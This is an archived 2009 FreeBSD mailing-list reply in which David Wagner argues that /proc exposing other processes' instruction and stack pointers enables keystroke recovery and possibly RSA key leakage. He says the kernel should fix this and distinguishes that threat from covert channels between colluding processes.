From owner-freebsd-hackers@FreeBSD.ORG Mon Aug 17 00:58:37 2009 Return-Path: Delivered-To: freebsd-hackers@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id BCABB1065672; Mon, 17 Aug 2009 00:58:37 +0000 (UTC) (envelope-from daw@cs.berkeley.edu) Received: from taverner.cs.berkeley.edu (taverner.CS.Berkeley.EDU [128.32.168.222]) by mx1.freebsd.org (Postfix) with ESMTP id 89CE28FC41; Mon, 17 Aug 2009 00:58:37 +0000 (UTC) Received: from taverner.cs.berkeley.edu (localhost.localdomain [127.0.0.1]) by taverner.cs.berkeley.edu (8.14.2/8.14.2) with ESMTP id n7H0wa4X005384 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Sun, 16 Aug 2009 17:58:37 -0700 Received: (from daw@localhost) by taverner.cs.berkeley.edu (8.14.2/8.14.2/Submit) id n7H0wahu005383; Sun, 16 Aug 2009 17:58:36 -0700 From: David Wagner Message-Id: <200908170058.n7H0wahu005383@taverner.cs.berkeley.edu> To: rwatson@FreeBSD.org (Robert N. M. Watson) Date: Sun, 16 Aug 2009 17:58:36 -0700 (PDT) In-Reply-To: <7F29E9E1-AB92-45E3-9DF3-C8455533BA19@FreeBSD.org> from "Robert N. M. Watson" at Aug 17, 2009 12:25:07 AM Secret-Bounce-Tag: 9a029cbee41caf2ca77a77efa3c13981 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailman-Approved-At: Mon, 17 Aug 2009 01:12:41 +0000 Cc: freebsd-hackers@FreeBSD.org, linux-kernel@vger.kernel.org, David Wagner , Oliver Pinter Subject: Re: Security: information leaks in /proc enable keystroke recovery X-BeenThere: freebsd-hackers@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Technical Discussions relating to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 17 Aug 2009 00:58:37 -0000 I still think my definitions of "covert channel" vs "side channel" better reflect accepted usage these days, but whatever. I don't have any great desire to debate the definitions. That doesn't seem like a good use of everyone's time. I was trying to define some shorthand to more concisely make my point. Since it appears my preferred shorthand turned out to be a barrier to communication, rather than an aid, I'll try to make my point again, this time spelling it out without using the problematic shorthand. I care more about the ultimate point than the language we use to communicate it. My broader point is this: I accept your argument that there is no point trying to defend against deliberate communication of information between two cooperating processes via some sneaky channel; there is no hope of stopping that in general-purpose commodity OS's. If process X and Y are both colluding to send information from X to Y, they will succeed, no matter how hard we try. We have no hope of closing all such channels, for general-purpose commodity OS's (like FreeBSD or Linux). However I do not accept that this argument means we should throw up our hands and ignore cases where the kernel allows malicious process Y to spy on process X, against X's will. If the kernel has a leak that lets process Y eavesdrop on keystrokes typed into process X, that's arguably worth fixing. Trying to prevent that is not clearly hopeless. There is a significant difference in threat model between "both X and Y are malicious and colluding with each other to facilitate some joint purpose shared by both X and Y" vs "Y is malicious and is attempting to subvert the security of process X, against X's will". If the designers deliberately intended to allow process Y to snoop on the ESP and EIP of process X, even when there is no relationship between X and Y (e.g., they don't have the same uid, and Y isn't root), well, I would claim that was a design error. Facilitating keystroke recovery does not seem like a good design goal. It's possible that the impact could be broader than discussed in the Usenix Security paper. Imagine if process X is doing crypto, say an RSA decryption, and process Y is running on the same machine and is malicious. If process Y is allowed to observe the EIP of process X, then process Y may be able to observe which path process X has taken through the code. In some cases, such as a naive implementation of RSA decryption, this may reveal X's private key. Leaking EIP and ESP to every other user on the same system strikes me as pretty dubious.